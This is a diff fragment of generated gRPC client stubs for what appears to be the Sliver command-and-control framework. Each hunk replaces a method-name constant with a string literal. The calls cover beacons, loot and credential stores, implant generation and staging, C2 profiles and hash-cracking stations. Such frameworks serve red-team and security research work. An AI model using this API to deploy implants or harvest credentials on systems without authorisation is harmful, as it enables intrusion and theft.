+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetBeaconTasks", in, out, opts...)
if err != nil {
return nil, err
}
@@ -648,7 +462,7 @@ func (c *sliverRPCClient) GetBeaconTasks(ctx context.Context, in *clientpb.Beaco
func (c *sliverRPCClient) GetBeaconTaskContent(ctx context.Context, in *clientpb.BeaconTask, opts ...grpc.CallOption) (*clientpb.BeaconTask, error) {
out := new(clientpb.BeaconTask)
- err := c.cc.Invoke(ctx, SliverRPC_GetBeaconTaskContent_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetBeaconTaskContent", in, out, opts...)
if err != nil {
return nil, err
}
@@ -657,7 +471,7 @@ func (c *sliverRPCClient) GetBeaconTaskContent(ctx context.Context, in *clientpb
func (c *sliverRPCClient) CancelBeaconTask(ctx context.Context, in *clientpb.BeaconTask, opts ...grpc.CallOption) (*clientpb.BeaconTask, error) {
out := new(clientpb.BeaconTask)
- err := c.cc.Invoke(ctx, SliverRPC_CancelBeaconTask_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CancelBeaconTask", in, out, opts...)
if err != nil {
return nil, err
}
@@ -666,7 +480,7 @@ func (c *sliverRPCClient) CancelBeaconTask(ctx context.Context, in *clientpb.Bea
func (c *sliverRPCClient) UpdateBeaconIntegrityInformation(ctx context.Context, in *clientpb.BeaconIntegrity, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_UpdateBeaconIntegrityInformation_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/UpdateBeaconIntegrityInformation", in, out, opts...)
if err != nil {
return nil, err
}
@@ -675,7 +489,7 @@ func (c *sliverRPCClient) UpdateBeaconIntegrityInformation(ctx context.Context,
func (c *sliverRPCClient) GetJobs(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Jobs, error) {
out := new(clientpb.Jobs)
- err := c.cc.Invoke(ctx, SliverRPC_GetJobs_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetJobs", in, out, opts...)
if err != nil {
return nil, err
}
@@ -684,7 +498,7 @@ func (c *sliverRPCClient) GetJobs(ctx context.Context, in *commonpb.Empty, opts
func (c *sliverRPCClient) KillJob(ctx context.Context, in *clientpb.KillJobReq, opts ...grpc.CallOption) (*clientpb.KillJob, error) {
out := new(clientpb.KillJob)
- err := c.cc.Invoke(ctx, SliverRPC_KillJob_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/KillJob", in, out, opts...)
if err != nil {
return nil, err
}
@@ -693,7 +507,7 @@ func (c *sliverRPCClient) KillJob(ctx context.Context, in *clientpb.KillJobReq,
func (c *sliverRPCClient) RestartJobs(ctx context.Context, in *clientpb.RestartJobReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_RestartJobs_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RestartJobs", in, out, opts...)
if err != nil {
return nil, err
}
@@ -702,7 +516,7 @@ func (c *sliverRPCClient) RestartJobs(ctx context.Context, in *clientpb.RestartJ
func (c *sliverRPCClient) StartTCPStagerListener(ctx context.Context, in *clientpb.StagerListenerReq, opts ...grpc.CallOption) (*clientpb.StagerListener, error) {
out := new(clientpb.StagerListener)
- err := c.cc.Invoke(ctx, SliverRPC_StartTCPStagerListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartTCPStagerListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -711,7 +525,7 @@ func (c *sliverRPCClient) StartTCPStagerListener(ctx context.Context, in *client
func (c *sliverRPCClient) LootAdd(ctx context.Context, in *clientpb.Loot, opts ...grpc.CallOption) (*clientpb.Loot, error) {
out := new(clientpb.Loot)
- err := c.cc.Invoke(ctx, SliverRPC_LootAdd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/LootAdd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -720,7 +534,7 @@ func (c *sliverRPCClient) LootAdd(ctx context.Context, in *clientpb.Loot, opts .
func (c *sliverRPCClient) LootRm(ctx context.Context, in *clientpb.Loot, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_LootRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/LootRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -729,7 +543,7 @@ func (c *sliverRPCClient) LootRm(ctx context.Context, in *clientpb.Loot, opts ..
func (c *sliverRPCClient) LootUpdate(ctx context.Context, in *clientpb.Loot, opts ...grpc.CallOption) (*clientpb.Loot, error) {
out := new(clientpb.Loot)
- err := c.cc.Invoke(ctx, SliverRPC_LootUpdate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/LootUpdate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -738,7 +552,7 @@ func (c *sliverRPCClient) LootUpdate(ctx context.Context, in *clientpb.Loot, opt
func (c *sliverRPCClient) LootContent(ctx context.Context, in *clientpb.Loot, opts ...grpc.CallOption) (*clientpb.Loot, error) {
out := new(clientpb.Loot)
- err := c.cc.Invoke(ctx, SliverRPC_LootContent_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/LootContent", in, out, opts...)
if err != nil {
return nil, err
}
@@ -747,7 +561,7 @@ func (c *sliverRPCClient) LootContent(ctx context.Context, in *clientpb.Loot, op
func (c *sliverRPCClient) LootAll(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.AllLoot, error) {
out := new(clientpb.AllLoot)
- err := c.cc.Invoke(ctx, SliverRPC_LootAll_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/LootAll", in, out, opts...)
if err != nil {
return nil, err
}
@@ -756,7 +570,7 @@ func (c *sliverRPCClient) LootAll(ctx context.Context, in *commonpb.Empty, opts
func (c *sliverRPCClient) Creds(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Credentials, error) {
out := new(clientpb.Credentials)
- err := c.cc.Invoke(ctx, SliverRPC_Creds_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Creds", in, out, opts...)
if err != nil {
return nil, err
}
@@ -765,7 +579,7 @@ func (c *sliverRPCClient) Creds(ctx context.Context, in *commonpb.Empty, opts ..
func (c *sliverRPCClient) CredsAdd(ctx context.Context, in *clientpb.Credentials, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CredsAdd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CredsAdd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -774,7 +588,7 @@ func (c *sliverRPCClient) CredsAdd(ctx context.Context, in *clientpb.Credentials
func (c *sliverRPCClient) CredsRm(ctx context.Context, in *clientpb.Credentials, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CredsRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CredsRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -783,7 +597,7 @@ func (c *sliverRPCClient) CredsRm(ctx context.Context, in *clientpb.Credentials,
func (c *sliverRPCClient) CredsUpdate(ctx context.Context, in *clientpb.Credentials, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CredsUpdate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CredsUpdate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -792,7 +606,7 @@ func (c *sliverRPCClient) CredsUpdate(ctx context.Context, in *clientpb.Credenti
func (c *sliverRPCClient) GetCredByID(ctx context.Context, in *clientpb.Credential, opts ...grpc.CallOption) (*clientpb.Credential, error) {
out := new(clientpb.Credential)
- err := c.cc.Invoke(ctx, SliverRPC_GetCredByID_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetCredByID", in, out, opts...)
if err != nil {
return nil, err
}
@@ -801,7 +615,7 @@ func (c *sliverRPCClient) GetCredByID(ctx context.Context, in *clientpb.Credenti
func (c *sliverRPCClient) GetCredsByHashType(ctx context.Context, in *clientpb.Credential, opts ...grpc.CallOption) (*clientpb.Credentials, error) {
out := new(clientpb.Credentials)
- err := c.cc.Invoke(ctx, SliverRPC_GetCredsByHashType_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetCredsByHashType", in, out, opts...)
if err != nil {
return nil, err
}
@@ -810,7 +624,7 @@ func (c *sliverRPCClient) GetCredsByHashType(ctx context.Context, in *clientpb.C
func (c *sliverRPCClient) GetPlaintextCredsByHashType(ctx context.Context, in *clientpb.Credential, opts ...grpc.CallOption) (*clientpb.Credentials, error) {
out := new(clientpb.Credentials)
- err := c.cc.Invoke(ctx, SliverRPC_GetPlaintextCredsByHashType_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetPlaintextCredsByHashType", in, out, opts...)
if err != nil {
return nil, err
}
@@ -819,7 +633,7 @@ func (c *sliverRPCClient) GetPlaintextCredsByHashType(ctx context.Context, in *c
func (c *sliverRPCClient) CredsSniffHashType(ctx context.Context, in *clientpb.Credential, opts ...grpc.CallOption) (*clientpb.Credential, error) {
out := new(clientpb.Credential)
- err := c.cc.Invoke(ctx, SliverRPC_CredsSniffHashType_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CredsSniffHashType", in, out, opts...)
if err != nil {
return nil, err
}
@@ -828,7 +642,7 @@ func (c *sliverRPCClient) CredsSniffHashType(ctx context.Context, in *clientpb.C
func (c *sliverRPCClient) Hosts(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.AllHosts, error) {
out := new(clientpb.AllHosts)
- err := c.cc.Invoke(ctx, SliverRPC_Hosts_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Hosts", in, out, opts...)
if err != nil {
return nil, err
}
@@ -837,7 +651,7 @@ func (c *sliverRPCClient) Hosts(ctx context.Context, in *commonpb.Empty, opts ..
func (c *sliverRPCClient) Host(ctx context.Context, in *clientpb.Host, opts ...grpc.CallOption) (*clientpb.Host, error) {
out := new(clientpb.Host)
- err := c.cc.Invoke(ctx, SliverRPC_Host_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Host", in, out, opts...)
if err != nil {
return nil, err
}
@@ -846,7 +660,7 @@ func (c *sliverRPCClient) Host(ctx context.Context, in *clientpb.Host, opts ...g
func (c *sliverRPCClient) HostRm(ctx context.Context, in *clientpb.Host, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_HostRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/HostRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -855,7 +669,7 @@ func (c *sliverRPCClient) HostRm(ctx context.Context, in *clientpb.Host, opts ..
func (c *sliverRPCClient) HostIOCRm(ctx context.Context, in *clientpb.IOC, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_HostIOCRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/HostIOCRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -864,7 +678,7 @@ func (c *sliverRPCClient) HostIOCRm(ctx context.Context, in *clientpb.IOC, opts
func (c *sliverRPCClient) Generate(ctx context.Context, in *clientpb.GenerateReq, opts ...grpc.CallOption) (*clientpb.Generate, error) {
out := new(clientpb.Generate)
- err := c.cc.Invoke(ctx, SliverRPC_Generate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Generate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -873,7 +687,7 @@ func (c *sliverRPCClient) Generate(ctx context.Context, in *clientpb.GenerateReq
func (c *sliverRPCClient) GenerateExternal(ctx context.Context, in *clientpb.ExternalGenerateReq, opts ...grpc.CallOption) (*clientpb.ExternalImplantConfig, error) {
out := new(clientpb.ExternalImplantConfig)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateExternal_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateExternal", in, out, opts...)
if err != nil {
return nil, err
}
@@ -882,7 +696,7 @@ func (c *sliverRPCClient) GenerateExternal(ctx context.Context, in *clientpb.Ext
func (c *sliverRPCClient) GenerateExternalSaveBuild(ctx context.Context, in *clientpb.ExternalImplantBinary, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateExternalSaveBuild_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateExternalSaveBuild", in, out, opts...)
if err != nil {
return nil, err
}
@@ -891,7 +705,7 @@ func (c *sliverRPCClient) GenerateExternalSaveBuild(ctx context.Context, in *cli
func (c *sliverRPCClient) GenerateExternalGetBuildConfig(ctx context.Context, in *clientpb.ImplantBuild, opts ...grpc.CallOption) (*clientpb.ExternalImplantConfig, error) {
out := new(clientpb.ExternalImplantConfig)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateExternalGetBuildConfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateExternalGetBuildConfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -900,7 +714,7 @@ func (c *sliverRPCClient) GenerateExternalGetBuildConfig(ctx context.Context, in
func (c *sliverRPCClient) GenerateStage(ctx context.Context, in *clientpb.GenerateStageReq, opts ...grpc.CallOption) (*clientpb.Generate, error) {
out := new(clientpb.Generate)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateStage_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateStage", in, out, opts...)
if err != nil {
return nil, err
}
@@ -909,7 +723,7 @@ func (c *sliverRPCClient) GenerateStage(ctx context.Context, in *clientpb.Genera
func (c *sliverRPCClient) StageImplantBuild(ctx context.Context, in *clientpb.ImplantStageReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_StageImplantBuild_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StageImplantBuild", in, out, opts...)
if err != nil {
return nil, err
}
@@ -918,7 +732,7 @@ func (c *sliverRPCClient) StageImplantBuild(ctx context.Context, in *clientpb.Im
func (c *sliverRPCClient) GetHTTPC2Profiles(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.HTTPC2Configs, error) {
out := new(clientpb.HTTPC2Configs)
- err := c.cc.Invoke(ctx, SliverRPC_GetHTTPC2Profiles_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetHTTPC2Profiles", in, out, opts...)
if err != nil {
return nil, err
}
@@ -927,7 +741,7 @@ func (c *sliverRPCClient) GetHTTPC2Profiles(ctx context.Context, in *commonpb.Em
func (c *sliverRPCClient) GetHTTPC2ProfileByName(ctx context.Context, in *clientpb.C2ProfileReq, opts ...grpc.CallOption) (*clientpb.HTTPC2Config, error) {
out := new(clientpb.HTTPC2Config)
- err := c.cc.Invoke(ctx, SliverRPC_GetHTTPC2ProfileByName_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetHTTPC2ProfileByName", in, out, opts...)
if err != nil {
return nil, err
}
@@ -936,7 +750,7 @@ func (c *sliverRPCClient) GetHTTPC2ProfileByName(ctx context.Context, in *client
func (c *sliverRPCClient) SaveHTTPC2Profile(ctx context.Context, in *clientpb.HTTPC2ConfigReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_SaveHTTPC2Profile_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/SaveHTTPC2Profile", in, out, opts...)
if err != nil {
return nil, err
}
@@ -944,7 +758,7 @@ func (c *sliverRPCClient) SaveHTTPC2Profile(ctx context.Context, in *clientpb.HT
}
func (c *sliverRPCClient) BuilderRegister(ctx context.Context, in *clientpb.Builder, opts ...grpc.CallOption) (SliverRPC_BuilderRegisterClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[1], SliverRPC_BuilderRegister_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[1], "/rpcpb.SliverRPC/BuilderRegister", opts...)
if err != nil {
return nil, err
}
@@ -977,7 +791,7 @@ func (x *sliverRPCBuilderRegisterClient) Recv() (*clientpb.Event, error) {
func (c *sliverRPCClient) BuilderTrigger(ctx context.Context, in *clientpb.Event, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_BuilderTrigger_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/BuilderTrigger", in, out, opts...)
if err != nil {
return nil, err
}
@@ -986,7 +800,7 @@ func (c *sliverRPCClient) BuilderTrigger(ctx context.Context, in *clientpb.Event
func (c *sliverRPCClient) Builders(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Builders, error) {
out := new(clientpb.Builders)
- err := c.cc.Invoke(ctx, SliverRPC_Builders_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Builders", in, out, opts...)
if err != nil {
return nil, err
}
@@ -995,7 +809,7 @@ func (c *sliverRPCClient) Builders(ctx context.Context, in *commonpb.Empty, opts
func (c *sliverRPCClient) GetCertificateInfo(ctx context.Context, in *clientpb.CertificatesReq, opts ...grpc.CallOption) (*clientpb.CertificateInfo, error) {
out := new(clientpb.CertificateInfo)
- err := c.cc.Invoke(ctx, SliverRPC_GetCertificateInfo_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetCertificateInfo", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1003,7 +817,7 @@ func (c *sliverRPCClient) GetCertificateInfo(ctx context.Context, in *clientpb.C
}
func (c *sliverRPCClient) CrackstationRegister(ctx context.Context, in *clientpb.Crackstation, opts ...grpc.CallOption) (SliverRPC_CrackstationRegisterClient, error) {
- stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[2], SliverRPC_CrackstationRegister_FullMethodName, opts...)
+ stream, err := c.cc.NewStream(ctx, &SliverRPC_ServiceDesc.Streams[2], "/rpcpb.SliverRPC/CrackstationRegister", opts...)
if err != nil {
return nil, err
}
@@ -1036,7 +850,7 @@ func (x *sliverRPCCrackstationRegisterClient) Recv() (*clientpb.Event, error) {
func (c *sliverRPCClient) CrackstationTrigger(ctx context.Context, in *clientpb.Event, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackstationTrigger_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackstationTrigger", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1045,7 +859,7 @@ func (c *sliverRPCClient) CrackstationTrigger(ctx context.Context, in *clientpb.
func (c *sliverRPCClient) CrackstationBenchmark(ctx context.Context, in *clientpb.CrackBenchmark, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackstationBenchmark_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackstationBenchmark", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1054,7 +868,7 @@ func (c *sliverRPCClient) CrackstationBenchmark(ctx context.Context, in *clientp
func (c *sliverRPCClient) Crackstations(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Crackstations, error) {
out := new(clientpb.Crackstations)
- err := c.cc.Invoke(ctx, SliverRPC_Crackstations_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Crackstations", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1063,7 +877,7 @@ func (c *sliverRPCClient) Crackstations(ctx context.Context, in *commonpb.Empty,
func (c *sliverRPCClient) CrackTaskByID(ctx context.Context, in *clientpb.CrackTask, opts ...grpc.CallOption) (*clientpb.CrackTask, error) {
out := new(clientpb.CrackTask)
- err := c.cc.Invoke(ctx, SliverRPC_CrackTaskByID_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackTaskByID", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1072,7 +886,7 @@ func (c *sliverRPCClient) CrackTaskByID(ctx context.Context, in *clientpb.CrackT
func (c *sliverRPCClient) CrackTaskUpdate(ctx context.Context, in *clientpb.CrackTask, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackTaskUpdate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackTaskUpdate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1081,7 +895,7 @@ func (c *sliverRPCClient) CrackTaskUpdate(ctx context.Context, in *clientpb.Crac
func (c *sliverRPCClient) CrackFilesList(ctx context.Context, in *clientpb.CrackFile, opts ...grpc.CallOption) (*clientpb.CrackFiles, error) {
out := new(clientpb.CrackFiles)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFilesList_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFilesList", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1090,7 +904,7 @@ func (c *sliverRPCClient) CrackFilesList(ctx context.Context, in *clientpb.Crack
func (c *sliverRPCClient) CrackFileCreate(ctx context.Context, in *clientpb.CrackFile, opts ...grpc.CallOption) (*clientpb.CrackFile, error) {
out := new(clientpb.CrackFile)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFileCreate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFileCreate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1099,7 +913,7 @@ func (c *sliverRPCClient) CrackFileCreate(ctx context.Context, in *clientpb.Crac
func (c *sliverRPCClient) CrackFileChunkUpload(ctx context.Context, in *clientpb.CrackFileChunk, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFileChunkUpload_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFileChunkUpload", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1108,7 +922,7 @@ func (c *sliverRPCClient) CrackFileChunkUpload(ctx context.Context, in *clientpb
func (c *sliverRPCClient) CrackFileChunkDownload(ctx context.Context, in *clientpb.CrackFileChunk, opts ...grpc.CallOption) (*clientpb.CrackFileChunk, error) {
out := new(clientpb.CrackFileChunk)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFileChunkDownload_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFileChunkDownload", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1117,7 +931,7 @@ func (c *sliverRPCClient) CrackFileChunkDownload(ctx context.Context, in *client
func (c *sliverRPCClient) CrackFileComplete(ctx context.Context, in *clientpb.CrackFile, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFileComplete_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFileComplete", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1126,7 +940,7 @@ func (c *sliverRPCClient) CrackFileComplete(ctx context.Context, in *clientpb.Cr
func (c *sliverRPCClient) CrackFileDelete(ctx context.Context, in *clientpb.CrackFile, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_CrackFileDelete_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CrackFileDelete", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1135,7 +949,7 @@ func (c *sliverRPCClient) CrackFileDelete(ctx context.Context, in *clientpb.Crac
func (c *sliverRPCClient) Regenerate(ctx context.Context, in *clientpb.RegenerateReq, opts ...grpc.CallOption) (*clientpb.Generate, error) {
out := new(clientpb.Generate)
- err := c.cc.Invoke(ctx, SliverRPC_Regenerate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Regenerate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1144,7 +958,7 @@ func (c *sliverRPCClient) Regenerate(ctx context.Context, in *clientpb.Regenerat
func (c *sliverRPCClient) ImplantBuilds(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.ImplantBuilds, error) {
out := new(clientpb.ImplantBuilds)
- err := c.cc.Invoke(ctx, SliverRPC_ImplantBuilds_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ImplantBuilds", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1153,7 +967,7 @@ func (c *sliverRPCClient) ImplantBuilds(ctx context.Context, in *commonpb.Empty,
func (c *sliverRPCClient) DeleteImplantBuild(ctx context.Context, in *clientpb.DeleteReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_DeleteImplantBuild_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/DeleteImplantBuild", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1162,7 +976,7 @@ func (c *sliverRPCClient) DeleteImplantBuild(ctx context.Context, in *clientpb.D
func (c *sliverRPCClient) Canaries(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Canaries, error) {
out := new(clientpb.Canaries)
- err := c.cc.Invoke(ctx, SliverRPC_Canaries_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Canaries", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1171,7 +985,7 @@ func (c *sliverRPCClient) Canaries(ctx context.Context, in *commonpb.Empty, opts
func (c *sliverRPCClient) GenerateWGClientConfig(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.WGClientConfig, error) {
out := new(clientpb.WGClientConfig)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateWGClientConfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateWGClientConfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1180,7 +994,7 @@ func (c *sliverRPCClient) GenerateWGClientConfig(ctx context.Context, in *common
func (c *sliverRPCClient) GenerateUniqueIP(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.UniqueWGIP, error) {
out := new(clientpb.UniqueWGIP)
- err := c.cc.Invoke(ctx, SliverRPC_GenerateUniqueIP_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GenerateUniqueIP", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1189,7 +1003,7 @@ func (c *sliverRPCClient) GenerateUniqueIP(ctx context.Context, in *commonpb.Emp
func (c *sliverRPCClient) ImplantProfiles(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.ImplantProfiles, error) {
out := new(clientpb.ImplantProfiles)
- err := c.cc.Invoke(ctx, SliverRPC_ImplantProfiles_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ImplantProfiles", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1198,7 +1012,7 @@ func (c *sliverRPCClient) ImplantProfiles(ctx context.Context, in *commonpb.Empt
func (c *sliverRPCClient) DeleteImplantProfile(ctx context.Context, in *clientpb.DeleteReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_DeleteImplantProfile_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/DeleteImplantProfile", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1207,16 +1021,7 @@ func (c *sliverRPCClient) DeleteImplantProfile(ctx context.Context, in *clientpb
